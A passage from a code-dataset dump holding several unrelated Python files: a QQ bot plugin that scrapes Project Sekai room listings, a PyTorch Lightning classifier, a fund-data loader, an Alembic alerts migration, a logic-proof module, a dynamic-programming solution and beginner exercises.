on_command('ycm', aliases={\"车来\", \"有车吗\", \"推车\"}, priority=5, block=True)\n\n\n@ycm.handle()\nasync def _():\n    await ycm.send('请稍后,正在获取推车中...', at_sender=True)\n    cars = await get_cars_wy()\n    if not cars:\n        cars = await get_cars_cc()\n    try:\n        pic = await render_reply(cars)\n        await ycm.send(image(pic))\n    except Exception as e:\n        logger.warning(f\"生成网页图片发生错误: {e}\")\n        await ycm.finish(\n            \"出错了,建议直接戳网址:\\n\"\n            \"http://1.117.147.194:8459/\\n\"\n            \"http://59.110.175.37:5000/\"\n        )\n\n\nasync def get_cars_wy() -> List:\n    try:\n        url = 'http://1.117.147.194:8459/'\n        html = (await AsyncHttpx.get(url, timeout=4)).text\n        xp = '/html/body//div[@class=\"item\"]'\n        trees = lxml.etree.HTML(html).xpath(xp)\n        car = {}\n        cars = []\n        for tree in trees:\n            car['room'] = tree.xpath('./h3/text()')[0]\n            car['des'] = '\\n'.join(tree.xpath('./div/text()'))\n            car['time'] = tree.xpath('./h5/text()')[0]\n            cars.append(car.copy())\n    except Exception as e:\n        logger.warning(f\"获取纹月推车发生错误: {e}\")\n        return []\n    else:\n        return cars\n\n\nasync def get_cars_cc() -> List:\n    try:\n        url = 'http://59.110.175.37:5000/'\n        # fetch the cart-station page\n        html = (await AsyncHttpx.get(url, timeout=4)).text\n        # parse the data\n        tree = lxml.etree.HTML(html)\n        xp = '/html/body/div/table//td/text()'\n        result = tree.xpath(xp)\n        # repackage the data for the webpage screenshot\n        car = {}\n        cars = []\n        for index, each in enumerate(result):\n            if index % 4 == 0:\n                pass\n            elif index % 4 == 1:\n                car['room'] = each\n            elif index % 4 == 2:\n                car['des'] = each\n            elif index % 4 == 3:\n                car['time'] = each\n                cars.append(car.copy())\n                car.clear()\n    except Exception as e:\n        logger.warning(f\"获取城城推车发生错误: {e}\")\n        return []\n    else:\n        return cars\n\n\nasync def render_reply(cars: List[Dict[str, str]]) -> bytes:\n    if not cars:\n        raise Exception('没有找到车!建议检查网页结构是否变化')\n    template_path = 
str(Path(__file__).parent / \"templates\")\n template_name = \"ycm.html\"\n return await template_to_pic(\n template_path=template_path,\n template_name=template_name,\n templates={\"cars\": cars},\n pages={\n \"viewport\": {\"width\": 1180, \"height\": 300},\n \"base_url\": f\"file://{template_path}\",\n },\n wait=0,\n )\n","repo_name":"cYanosora/kndbot","sub_path":"plugins/pjsk/ycm/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"14416282276","text":"import pytorch_lightning as pl\nimport torch\nfrom torch import nn\nfrom torch.nn import BCELoss, BCEWithLogitsLoss\nfrom torchmetrics import Accuracy, Recall, Precision\nfrom torchmetrics.functional import f1_score\n\n\nclass Model(pl.LightningModule):\n \n def __init__(self,\n use_cpu: bool = False,\n learning_rate: float = 0.001, # 1e-5\n input_size: int = 43,\n hidden_size: int = 10,\n output_size: int = 1,\n dropout_rate: float = 0.0\n ):\n super().__init__()\n self.save_hyperparameters()\n\n # Architecture layers\n self.input_size = input_size\n self.l1 = nn.Linear(input_size, hidden_size)\n self.relu = nn.ReLU()\n self.l2 = nn.Linear(hidden_size, output_size)\n self.dropout = nn.Dropout(p=dropout_rate) if dropout_rate and dropout_rate else None\n\n\n self.learning_rate = learning_rate\n self.fold_number: int = 0\n\n self.all_validation_ys = torch.empty(0, dtype=torch.float32)\n self.all_validation_y_hats = torch.empty(0, dtype=torch.float32)\n self.gpu_used = not use_cpu and torch.cuda.is_available()\n if self.gpu_used:\n self.all_validation_ys = self.all_validation_ys.cuda()\n self.all_validation_y_hats = self.all_validation_y_hats.cuda()\n\n self.train_acc = Accuracy(\"binary\")\n self.val_acc = Accuracy(\"binary\")\n self.val_recall = Recall(\"binary\")\n self.val_precision = Precision(\"binary\")\n\n self.criterion = BCEWithLogitsLoss()\n\n def forward(self, x):\n out = self.l1(x)\n out = self.relu(out)\n out = self.l2(out)\n if self.dropout:\n out = self.dropout(out)\n # no activation and no softmax at the end\n return out\n\n def set_fold(self, fold_number):\n self.fold_number = fold_number\n\n def validation_epoch_end(self, outputs):\n # Save all validation outputs for metrics logging in callbacks\n ys = [batch_result[0] for batch_result in outputs]\n y_hats = [batch_result[1] for batch_result in outputs]\n self.all_validation_ys = torch.cat(ys).view(-1)\n self.all_validation_y_hats = torch.cat(y_hats).view(-1)\n\n def configure_optimizers(self):\n return torch.optim.Adam(self.parameters(), lr=self.learning_rate)\n\n def training_step(self, batch, batch_idx):\n x, y = batch.values()\n y_hat = self(x)\n loss = self.criterion(y_hat, y.view(-1,1))\n # self.log_train_metrics(y, y_hat) # Uncomment for debugging\n self.log(f'fold_{self.fold_number}_loss/training', loss, on_step=False, on_epoch=True)\n return loss\n\n def log_train_metrics(self, y, y_hat):\n # We log these metrics mostly to see that the training is going alright\n train_acc = self.train_acc(y_hat, y.int())\n train_f1_score = f1_score(y_hat, y.int())\n self.log(f'fold_{self.fold_number}_metrics/train_acc', train_acc, on_step=True, on_epoch=True)\n self.log(f'fold_{self.fold_number}_metrics/train_f1_score', train_f1_score)\n\n def validation_step(self, batch, batch_idx):\n x, y = batch.values()\n y_hat = self(x)\n loss = self.criterion(y_hat, y.view(-1,1))\n self.log(f'fold_{self.fold_number}_loss/validation', loss)\n return y, 
y_hat\n","repo_name":"mwaehner/redes-sociedad-economia-tp-final","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3695330319","text":"import pandas as pd\nimport numpy as np\nimport timeit\nimport os\n\nclass Load:\n def __init__(self, db_path, fund_names, min_days, max_missing_days):\n self._fund_names = fund_names\n self._path = db_path\n self._min_days = min_days\n self._max_missing_days = max_missing_days\n\n def _read_file(self, path, fund_name):\n filename = \"{0}.csv\".format(fund_name)\n filepath = os.path.join(path, filename)\n\n # Workaround for bug #15086\n filehandle = open(filepath, \"r\")\n df = pd.read_csv(filehandle, \n names=[\"date\", \"nav\", \"id\"], \n usecols=[1, 2, 3],\n skiprows=1)\n\n return df\n\n def _set_index_date(self, df):\n # convert text string to pandas datetimestamp\n df['date'] = pd.to_datetime(df['date'])\n # use as index\n df = df.set_index(\"date\")\n\n return df\n\n def _reindex_using_business_days(self, df):\n # reindex using business days\n start = df.first_valid_index()\n end = df.last_valid_index()\n range = pd.date_range(start, end, freq='B')\n df = df.reindex(range)\n # now check nbr of missing days in a row\n self._check_na_days(df)\n\n return df\n\n class TooManyMissingDays(Exception):\n pass\n\n def _check_na_days(self, df):\n row_status = df.isnull().nav\n only_nulls = row_status[row_status == True].index\n if len(only_nulls) == 0:\n return\n\n start_date = pd.Timestamp(only_nulls[0], freq=\"B\")\n nbr_missing_days = 0\n\n for date in only_nulls:\n if start_date == date:\n start_date = start_date + start_date.freq\n nbr_missing_days += 1\n else:\n start_date = pd.Timestamp(date, freq=\"B\")\n nbr_missing_days = 1\n\n if nbr_missing_days >= self._max_missing_days:\n raise Load.TooManyMissingDays()\n\n def _fill_na_days(self, df):\n df = df.fillna(method=\"ffill\")\n return df\n\n def _remove_duplicates(self, df):\n df = df[~df.index.duplicated()]\n return df\n\n def _remove_zero_values(self, df):\n df = df[df.nav != 0]\n return df\n\n def _add_fund(self, funds, df, fund_name):\n df.name = fund_name \n funds[fund_name] = df\n\n def _adjust_fund_remake(self, df):\n contains_id_nbr = df.id.apply(lambda x: np.isreal(x)).all()\n if not contains_id_nbr:\n return\n\n # Detect if Id is changed i.e. 
fund is recreated to a new fund \n diff = df.id.diff()\n\n change = df.nav.pct_change()\n fund_remakes = diff[diff != 0]\n for index, _ in fund_remakes.iteritems():\n updated_rows = df[index:].nav / (1 + change[index])\n df.update(updated_rows)\n\n def _adjust_fund_abnormal(self, df):\n change = df.nav.pct_change()\n # Detect if change in fund is more than 10% interday\n abnormal_change = change[abs(change) > 0.1]\n for date_index, percent_change in abnormal_change.iteritems():\n updated_rows = df[date_index:].nav / (1 + percent_change)\n df.update(updated_rows)\n\n def _do_operations_on_dataset(self, df):\n df = self._set_index_date(df)\n df = self._remove_duplicates(df)\n df = self._reindex_using_business_days(df)\n df = self._fill_na_days(df)\n df = self._remove_zero_values(df)\n self._adjust_fund_remake(df)\n self._adjust_fund_abnormal(df)\n\n return df\n\n class NotEnoughNbrDays(Exception):\n pass\n\n def _check_min_days(self, df):\n height, _ = df.shape\n if height < self._min_days:\n raise Load.NotEnoughNbrDays()\n\n def _load_single_fund(self, fund_name):\n df = self._read_file(self._path, fund_name) \n df = self._do_operations_on_dataset(df)\n self._check_min_days(df)\n\n return df\n\n def execute(self):\n funds = {}\n\n for fund_name in self._fund_names:\n try:\n #print(\"Loading {}\".format(fund_name))\n df = self._load_single_fund(fund_name)\n self._add_fund(funds, df, fund_name)\n except Load.NotEnoughNbrDays:\n print(\"{}: not enough number of days\".format(fund_name))\n except Load.TooManyMissingDays:\n print(\"{}: too many missing days in a row\".format(fund_name))\n \n return funds","repo_name":"engelvinter/Xtrend","sub_path":"seb/load/Load.py","file_name":"Load.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27752581358","text":"import sys\r\ninputF = sys.stdin.readline\r\n\r\nn = int(inputF())\r\ndp = [[0, 0, 0] for _ in range(n)]\r\nhouse = [list(map(int, inputF().split())) for _ in range(n)]\r\n\r\nfor i in range(n):\r\n if i == 0:\r\n dp[0][0] = house[i][0]\r\n dp[0][1] = house[i][1]\r\n dp[0][2] = house[i][2]\r\n else:\r\n dp[i][0] = house[i][0] + min(dp[i-1][1], dp[i-1][2])\r\n\r\n dp[i][1] = house[i][1] + min(dp[i - 1][0], dp[i - 1][2])\r\n\r\n dp[i][2] = house[i][2] + min(dp[i - 1][0], dp[i - 1][1])\r\n\r\nprint(min(dp[n-1]))","repo_name":"nube-net/baekjoon-nube-net-gytjdttop-","sub_path":"백준/Silver/1149. 
RGB거리/RGB거리.py","file_name":"RGB거리.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12037531232","text":"\"\"\"Add full alerts support\n\nRevision ID: 2bbd670f53b4\nRevises: 08ce9c5194a4\nCreate Date: 2020-05-15 09:36:44.069109\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"2bbd670f53b4\"\ndown_revision = \"08ce9c5194a4\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n \"alert_active_period\",\n sa.Column(\"pk\", sa.Integer(), nullable=False),\n sa.Column(\"alert_pk\", sa.Integer(), nullable=False),\n sa.Column(\"starts_at\", sa.TIMESTAMP(timezone=True), nullable=True),\n sa.Column(\"ends_at\", sa.TIMESTAMP(timezone=True), nullable=True),\n sa.ForeignKeyConstraint(\n [\"alert_pk\"],\n [\"alert.pk\"],\n ),\n sa.PrimaryKeyConstraint(\"pk\"),\n )\n op.create_index(\n op.f(\"ix_alert_active_period_alert_pk\"),\n \"alert_active_period\",\n [\"alert_pk\"],\n unique=False,\n )\n op.create_table(\n \"alert_message\",\n sa.Column(\"pk\", sa.Integer(), nullable=False),\n sa.Column(\"alert_pk\", sa.Integer(), nullable=False),\n sa.Column(\"header\", sa.String(), nullable=False),\n sa.Column(\"description\", sa.String(), nullable=False),\n sa.Column(\"url\", sa.String(), nullable=True),\n sa.Column(\"language\", sa.String(), nullable=True),\n sa.ForeignKeyConstraint(\n [\"alert_pk\"],\n [\"alert.pk\"],\n ),\n sa.PrimaryKeyConstraint(\"pk\"),\n )\n op.create_index(\n op.f(\"ix_alert_message_alert_pk\"), \"alert_message\", [\"alert_pk\"], unique=False\n )\n op.create_table(\n \"alert_stop\",\n sa.Column(\"alert_pk\", sa.Integer(), nullable=True),\n sa.Column(\"stop_pk\", sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(\n [\"alert_pk\"],\n [\"alert.pk\"],\n ),\n sa.ForeignKeyConstraint(\n [\"stop_pk\"],\n [\"stop.pk\"],\n ),\n )\n op.create_index(\n op.f(\"ix_alert_stop_alert_pk\"), \"alert_stop\", [\"alert_pk\"], unique=False\n )\n op.create_index(\n op.f(\"ix_alert_stop_stop_pk\"), \"alert_stop\", [\"stop_pk\"], unique=False\n )\n op.create_table(\n \"alert_trip\",\n sa.Column(\"alert_pk\", sa.Integer(), nullable=True),\n sa.Column(\"trip_pk\", sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(\n [\"alert_pk\"],\n [\"alert.pk\"],\n ),\n sa.ForeignKeyConstraint(\n [\"trip_pk\"],\n [\"trip.pk\"],\n ),\n )\n op.create_index(\n op.f(\"ix_alert_trip_alert_pk\"), \"alert_trip\", [\"alert_pk\"], unique=False\n )\n op.create_index(\n op.f(\"ix_alert_trip_trip_pk\"), \"alert_trip\", [\"trip_pk\"], unique=False\n )\n op.add_column(\n \"alert\", sa.Column(\"created_at\", sa.TIMESTAMP(timezone=True), nullable=True)\n )\n op.add_column(\"alert\", sa.Column(\"sort_order\", sa.Integer(), nullable=True))\n op.add_column(\n \"alert\", sa.Column(\"updated_at\", sa.TIMESTAMP(timezone=True), nullable=True)\n )\n op.drop_column(\"alert\", \"creation_time\")\n op.drop_column(\"alert\", \"url\")\n op.drop_column(\"alert\", \"description\")\n op.drop_column(\"alert\", \"header\")\n op.drop_column(\"alert\", \"start_time\")\n op.drop_column(\"alert\", \"end_time\")\n op.drop_column(\"alert\", \"priority\")\n op.create_index(\n op.f(\"ix_alert_agency_alert_pk\"), \"alert_agency\", [\"alert_pk\"], unique=False\n )\n op.create_index(\n op.f(\"ix_alert_route_alert_pk\"), \"alert_route\", [\"alert_pk\"], unique=False\n )\n op.alter_column(\"stop\", \"type\", existing_type=sa.VARCHAR(length=16), 
nullable=False)\n","repo_name":"jamespfennell/transiter-python","sub_path":"transiter/db/alembic/versions/2bbd670f53b4_add_full_alerts_support.py","file_name":"2bbd670f53b4_add_full_alerts_support.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70302818793","text":"\n\n\n\ndef prepare_output(word, greek_dict):\n reduced_def = get_word_info(dictionary, word, \"\")\n sent = []\n ant_sent = []\n vars = {}\n vars2 = set()\n cvars = set()\n output = get_output()\n for z, cls in enumerate(reduced_def):\n sentences = cls.sentences\n adjust_ant_index(ant_sent, cls, sent, sentences, vars, vars2, greek_dict)\n adjust_con_index(cls, cvars, output, sent, sentences)\n output.prop_var = get_prop_var()\n output.prop_name = defaultdict(lambda: output.prop_var.pop(), {})\n for tsent in sent:\n tsent[2] = name_sent(tsent[1], output.prop_name)\n output.oprop_name[tsent[2]] = tsent[1]\n\n output.main_var = vars\n output.all_sent = sent\n output.abbreviations = json.loads(json.dumps(dictionary.def_constants.get(word, {})))\n output.variables = get_variables()\n output.user = \"\"\n\n for k in output.abbreviations.keys(): output.variables.remove(k)\n for var in vars2 | cvars:\n if var in output.variables: output.variables.remove(var)\n\n return output, vars, reduced_def\n\n\ndef adjust_ant_index(ant_sent, cls, sent, sentences, vars, vars2, greek_dict):\n kind = dictionary.kind.get(word)\n\n for num in cls.def_stats.ant_index:\n if isinstance(num, int):\n ant_sent.append(sentences[num])\n for noun in sentences[num][42]:\n if kind in ['c', 'i', 'p'] and sentences[num][13] in [\"I\", \"J\", \"=\"] and noun == 14:\n pass\n else:\n if sentences[num][noun] not in vars.keys():\n vars.update({sentences[num][noun]: noun})\n vars2.add(sentences[num][noun])\n\n try:\n idx = findposinmd(sentences[num][0], sent, 0)\n except:\n idx = -1\n if idx == -1 and sentences[num][56] == \"c\":\n sentences[num][7] = sentences[num][56]\n sentences[num][43] = 'do not define'\n sent.append(sentences[num])\n else:\n for cnum in num:\n for noun in sentences[cnum][42]:\n vars.update({sentences[num][noun]: noun})\n vars2.add(sentences[cnum][noun])\n greek_dict[sentences[num][noun]]\n ant_sent.append(sentences[cnum])\n sentences[cnum][7] = sentences[cnum][56]\n\n\ndef adjust_con_index(cls, cvars, output, sent, sentences):\n for num in cls.def_stats.con_index:\n cons_count = 0\n if isinstance(num, int):\n sentences[num][7] = 'c'\n if sentences[num][3] == \"~\":\n dictionary.negative_definitions.add(word)\n\n sent.append(sentences[num])\n for noun in sentences[num][42]: cvars.add(sentences[num][noun])\n else:\n tnum = cls.def_stats.con_hnum[cons_count]\n embed = cls.embeds.get(tnum)\n embed.sentences = sentences\n sub_word = embed.def_stats.def_word_num\n add_to_gsent([embed], output)\n output.trans_def.update({sub_word: embed})\n cons_count += 1\n for cnum in num:\n dictionary.connected_definitions.add(word)\n if sentences[cnum][3] == \"~\":\n dictionary.negative_definitions.add(word)\n sent.append(sentences[cnum])\n for noun in sentences[cnum][42]: cvars.add(sentences[cnum][noun])\n\n\n########################\n########## perhaps delete\n\n\ndef instantiate_from_lemmas(word, greek_dict):\n output, consistent, reduced = try_instantiation(output, dictionary, \"lemmas\")\n if not consistent and proof_type == 5:\n output = rearrange(\"last\", output, consistent, \"\", output.main_var)\n print_sent([output.total_sent], [0], 2)\n print 
(word)\n raise Exception\n\n\ndef build_basic_definition(output, reduced, word):\n if reduced:\n list2 = dictionary.categorized_sent.get(word)\n nat_ant = list2[0].def_stats.natural_antecedent\n ant_greek = list2[0].def_stats.ant_greek\n conn = iff if list2[0].def_stats.connection_type == 'e' else conditional\n j = 0\n while output.all_sent[0][5] in ant_greek:\n j += 1\n del output.all_sent[0]\n if j > 5: raise Exception\n\n list1 = list(filter(lambda x: x[0] != 'irrelevant', output.all_sent))\n list1 = [x[0] for x in list1]\n for k, defin in output.trans_def.items():\n if \",\" in k:\n sentences = defin.sentences\n conn_sent = defin.def_stats.tot_greek_sent\n nant = adjust_sides(defin.def_stats.ant_index, output, sentences)\n ncon = adjust_sides(defin.def_stats.con_index, output, sentences)\n\n for e, sentence in enumerate(sentences):\n conn_sent = conn_sent.replace(sentence[5], sentence[0])\n\n output.lemma_embed.update({k: json.loads(json.dumps([nant, ncon]))})\n list1.append(conn_sent)\n\n basic_definition = nat_ant + \" \" + conn + \" (\" + \" & \".join(list1) + \")\"\n if output.abbreviations != {}:\n str1 = \" & \".join([build_connection(\"(\" + k, \"=\", v + \")\") for k, v in output.abbreviations.items()])\n basic_definition = build_connection(basic_definition, \" & \", str1)\n\n dictionary.basic_definitions.update({word: basic_definition})\n else:\n definition = dictionary.definitions.get(word)\n if definition != None:\n dictionary.basic_definitions.update({word: definition})\n\n\ndef print_to_excel(proof_type):\n if proof_type != 5:\n wb5 = load_workbook('/Users/kylefoley/PycharmProjects/inference_engine2/inference2/Proofs/dictionary5.xlsx')\n w5 = wb5.worksheets[4]\n row_number = 1\n for k, v in dictionary.basic_definitions.items():\n w5.cell(row=row_number, column=1).value = k\n w5.cell(row=row_number, column=2).value = v\n row_number += 1\n\n wb5.save('/Users/kylefoley/PycharmProjects/inference_engine2/inference2/Proofs/dictionary5.xlsx')\n\n\ndef generate_multiple_possibilities(power_set1, possibilities, new_sets):\n for st in power_set1:\n if len(st) > 1:\n new_sets2 = [new_sets[num] for num in st]\n possibilities2 = [i for i in itertools.product(*new_sets2)]\n for tpl in possibilities2:\n possibilities.append([possibilities[num] for num in tpl])\n\n for e, itm in enumerate(possibilities):\n if isinstance(itm, tuple):\n possibilities[e] = [possibilities[e]]\n\n return possibilities\n\n\ndef large_possibilities(xindex, yindex):\n possibilities = [xindex, yindex]\n possibilities = [i for i in itertools.product(*possibilities)]\n max_len = len(xindex) if len(xindex) >= len(yindex) else len(yindex)\n new_sets = []\n sub_sets = []\n for x in range(len(possibilities)):\n if (x + 1) % max_len == 0:\n sub_sets.append(x)\n new_sets.append(json.loads(json.dumps(sub_sets)))\n sub_sets = []\n else:\n sub_sets.append(x)\n\n power_set1 = list(powerset([x for x in range(len(new_sets))]))\n\n return generate_multiple_possibilities(power_set1, possibilities, new_sets)\n\n\ndef consistent_classes(xword, yword, lemmata):\n xclass = dictionary.groups.get(xword, {10: \"thing\", 14: \"thing\"})\n yclass = dictionary.groups.get(yword, {10: \"thing\", 14: \"thing\"})\n xindex = [k for k, y in xclass.items()]\n yindex = [k for k, y in yclass.items()]\n if len(xindex) < 3 and len(yindex) < 3:\n possibilities = [xindex, yindex]\n possibilities = [i for i in itertools.product(*possibilities)]\n else:\n possibilities = large_possibilities(xindex, yindex)\n\n consistent_classes2(xword, yword, xclass, 
yclass, possibilities, lemmata)\n\n\ndef consistent_classes2(xword, yword, xclass, yclass, possibilities, lemmata):\n for possibility in possibilities:\n xgroup = xclass.get(possibility[0], 'thing')\n ygroup = yclass.get(possibility[1], 'thing')\n if xgroup == ygroup:\n build_entry(xword, yword, possibility, lemmata, True)\n elif xgroup == 'thing' or ygroup == 'thing':\n build_entry(xword, yword, possibility, lemmata, True)\n else:\n list1 = [xgroup, ygroup]\n list1.sort()\n pair = \".\".join(list1)\n tvalue = dictionary.ontology[2].get(pair)\n assert tvalue != None\n if not tvalue:\n build_entry(xword, yword, possibility, lemmata, False)\n else:\n build_entry(xword, yword, possibility, lemmata, True)\n\n\ndef build_entry(xword, yword, possibility, lemmata, tvalue):\n list1 = [xword, yword]\n list1.sort()\n str1 = list1[0] + \".\" + list1[1]\n for num in possibility:\n str1 += \".\" + str(num)\n lemmata.update({str1: tvalue})\n return\n\n\ndef modify_abbreviations(youtput, xoutput, xvar, abbrev_dict):\n xabbrev = xoutput.abbreviations\n for k, v in youtput.abbreviations.items():\n if v in xabbrev.values():\n new_var = get_key(xabbrev, v)\n abbrev_dict.update({k: new_var})\n elif k not in xvar:\n new_var = xvar[0]\n abbrev_dict.update({k: new_var})\n del xvar[0]\n\n\ndef modify_variables(youtput, xoutput):\n xvars = xoutput.variables\n yvars = youtput.variables\n xprop_name = xoutput.prop_name\n xoprop_name = xoutput.oprop_name\n\n tvars = list(set(xvars) | set(yvars))\n abbrev_dict = {}\n modify_abbreviations(youtput, xoutput, xvars, abbrev_dict)\n\n for sentence in youtput.all_sent:\n changed = False\n for pos in sentence[42]:\n yvar = sentence[pos]\n value = abbrev_dict.get(yvar)\n if value != None:\n changed = True\n sentence[pos] = value\n elif yvar in youtput.main_var:\n pass\n elif yvar not in xvars:\n changed = True\n new_var = tvars[0]\n sentence[pos] = new_var\n abbrev_dict.update({yvar: new_var})\n del tvars[0]\n if changed:\n name_and_build(xoutput, sentence)\n else:\n sentence[2] = name_sent(sentence[1], xprop_name)\n xoprop_name[sentence[2]] = sentence[1]\n\n return\n\n\ndef get_basic_sent(tword):\n with open(\"basic/\" + tword + \".json\", \"r\") as fp:\n return json.load(fp)\n\n\ndef reload_sentences(output, anc):\n for k, v in output.trans_def.items():\n list2 = []\n list1 = output.lemma_embed.get(k)\n v.def_stats.ant_index = list1[0]\n v.def_stats.con_index = list1[1]\n v.def_stats.tot_sent_idx = anc\n\n for e, idx in enumerate(list1[0] + list1[1]):\n list2.append(output.all_sent[idx])\n v.sentences = json.loads(json.dumps(list2))\n\n return\n\n\ndef quick_contradiction(xoutput, youtput):\n xlist = list(filter(lambda x: x[7] == 'c', xoutput.all_sent))\n ylist = list(filter(lambda x: x[7] == 'c', youtput.all_sent))\n xvar = set(map(lambda x: x[2], xlist))\n yvar = set(map(lambda x: x[2], ylist))\n for var in xvar & yvar:\n xtvalue = find_counterpart_inlist(var, xoutput.all_sent, 2, 3)\n ytvalue = find_counterpart_inlist(var, youtput.all_sent, 2, 3)\n if xtvalue != ytvalue:\n return False\n return True\n\n\ndef name_xsent(xoutput):\n for sentence in xoutput.all_sent:\n sentence[2] = name_sent(sentence[1], xoutput.prop_name)\n xoutput.oprop_name.update({sentence[2]: sentence[1]})\n\n\ndef adjust_index2(output, new_sent, list1):\n sentences = output.all_sent\n new_index = []\n for e, num in enumerate(list1):\n if isinstance(num, int):\n new_sent.append(sentences[num])\n new_index.append(len(new_sent) - 1)\n else:\n list2 = []\n for f, cnum in enumerate(num):\n 
new_sent.append(sentences[cnum])\n                list2.append(len(new_sent) - 1)\n            new_index.append(list2)\n\n    return new_index\n\n\ndef adjust_index(output):\n    for k, v in output.trans_def.items():\n        new_sent = []\n        new_index = adjust_index2(output, new_sent, v.def_stats.ant_index)\n        v.def_stats.ant_index = new_index\n        new_index = adjust_index2(output, new_sent, v.def_stats.con_index)\n        v.def_stats.con_index = new_index\n        v.sentences = json.loads(json.dumps(new_sent))\n\n\ndef do_not_instantiate(xoutput, youtput, len_asent):\n    output3 = xoutput if youtput == [] else youtput\n    for k, v in output3.trans_def.items():\n        for e, sent in enumerate(xoutput.all_sent[len_asent:]):\n            xoutput.disj_elim.append([e, v.def_stats.def_word_num])\n\n\ndef make_matrix2(xword, yword, lemmata, user):\n    kind = consistent_classes(xword, yword, lemmata)\n    if kind == 'no definition':\n        pass\n    else:\n        youtput = dictionary.basic_output.get(yword)\n        youtput.all_sent = get_basic_sent(yword)\n        reload_sentences(youtput, 2)\n        xoutput = dictionary.basic_output.get(xword)\n        xoutput.all_sent = get_basic_sent(xword)\n        xoutput.prop_var = get_prop_var()\n        xoutput.prop_name = defaultdict(lambda: xoutput.prop_var.pop(), {})\n        name_xsent(xoutput)\n        reload_sentences(xoutput, 1)\n        modify_variables(youtput, xoutput)\n        if not quick_contradiction(xoutput, youtput):\n            print('contradiction found')\n        else:\n            adjust_index(xoutput)\n            adjust_index(youtput)\n            do_not_instantiate(xoutput, [], 0)\n            len_asent = len(xoutput.all_sent)\n            xoutput.all_sent = xoutput.all_sent + youtput.all_sent\n            do_not_instantiate(xoutput, youtput, len_asent)\n            xoutput.trans_def = {**xoutput.trans_def, **youtput.trans_def}\n            for k, v in xoutput.trans_def.items(): add_to_gsent([v], xoutput)\n            if xoutput.gsent != []:\n                fill_tsent(xoutput, xword, yword, len_asent)\n                loop_through_gsent(xoutput, \"lemmas2\", dictionary)\n                consistent = True if xoutput.total_sent[-1][1] == consist else False\n                rearrange(\"last\", xoutput, consistent, \"lemmas2\", xoutput.main_var)\n\n    return\n\n\ndef fill_tsent(xoutput, xword, yword, len_asent):\n    xoutput.tindex = 0\n    basic_definition = dictionary.basic_definitions.get(xword)\n    add_to_tsent(xoutput, basic_definition)\n    basic_definition = dictionary.basic_definitions.get(yword)\n    add_to_tsent(xoutput, basic_definition)\n    for sent in xoutput.all_sent[:len_asent]:\n        if sent[7] == 'c':\n            add_to_tsent(xoutput, sent[1], \"\", sent[3], \"&E\", 1)\n    for sent in xoutput.all_sent[len_asent:]:\n        if sent[7] == 'c':\n            add_to_tsent(xoutput, sent[1], \"\", sent[3], \"&E\", 2)\n    for k, v in xoutput.trans_def.items():\n        anc1 = v.def_stats.tot_sent_idx\n        add_to_tsent(xoutput, v.def_stats.natural_sent, \"\", \"\", \"&E\", anc1)\n\n\ndef adjust_prop_name(output):\n    nprop_name = {}\n    for k, v in output.prop_name.items():\n        s = k.split()\n        s = \"\".join(s)\n        nprop_name.update({s: v})\n\n    output.prop_name = nprop_name\n\n\ndef get_from_all_sent(num, output, sentences, list2):\n    idx = findposinmd(sentences[num][0], output.all_sent, 0)\n    if idx == -1:\n        output.all_sent.append(sentences[num])\n        list2.append(len(output.all_sent) - 1)\n    else:\n        list2.append(idx)\n\n\ndef adjust_sides(list1, output, sentences):\n    list2 = []\n    for e, num in enumerate(list1):\n        if isinstance(num, int):\n            get_from_all_sent(num, output, sentences, list2)\n        else:\n            list3 = []\n            for cnum in num:\n                get_from_all_sent(cnum, output, sentences, list3)\n            list2.append(json.loads(json.dumps(list3)))\n\n    return list2\n\n\ndef eliminate_possessive():\n    test_lemmas = []\n    for e, word in enumerate(words_used):\n        if 
word[-2:] == \"'s\":\n test_lemmas.append(word[:-2])\n elif word in dictionary.rel_abbrev.keys():\n pass\n else:\n pos = dictionary.pos.get(word)\n if pos != None:\n if pos[0] in ['n', 'a', 'r']:\n test_lemmas.append(word)\n\n return test_lemmas\n\n\ndef make_matrix(user):\n global dictionary\n pkl_file = open(user + 'z_dict_words.pkl', 'rb')\n dictionary = pickle.load(pkl_file)\n pkl_file.close()\n lemmata = {}\n word_list = []\n words_used = eliminate_possessive()\n for xword in words_used:\n for yword in words_used:\n if xword[0] != yword[0]:\n list1 = [xword[0], yword[0]]\n list1.sort()\n if list1 != ['o', 'o']:\n if list1 not in word_list:\n consistent_classes(xword, yword, lemmata)\n\n temp = open(user + 'lemmata.pkl', 'wb')\n pickle.dump(lemmata, temp)\n temp.close()\n\n return","repo_name":"kylefoley76/inference_engine","sub_path":"inference2/Proofs/instantiate_lemmas.py","file_name":"instantiate_lemmas.py","file_ext":"py","file_size_in_byte":16977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16079374775","text":"\n#Given an integer, take the individual digits and add them togeather\nif False:\n input = 39\n\n print(type(input))\n inputString = str(input)\n\n result = 0\n for char in inputString:\n result += int(char)\n\n print(result)\n\n\n#BMI Calculator\nif False:\n height = input(\"Please enter your height (m):\\n\")\n weight = input(\"Please enter your weight (kg):\\n\")\n\n heightFloat = float(height)\n weightFloat = float(weight)\n\n bmi = weightFloat / (heightFloat ** 2)\n bmiInteger = int(bmi)\n print(\"Your BMI is: \" + str(bmiInteger))\n\n\n#Based off the age of 90\n#Calculate how many weeks a person has given their age\nif False:\n totalPossibleWeeks = 52*90\n currentWeeksUsed = 52 * int(input(\"How old are you?\\n\"))\n currentWeeksLeft = totalPossibleWeeks - currentWeeksUsed\n\n print(f\"You have {currentWeeksLeft} weeks 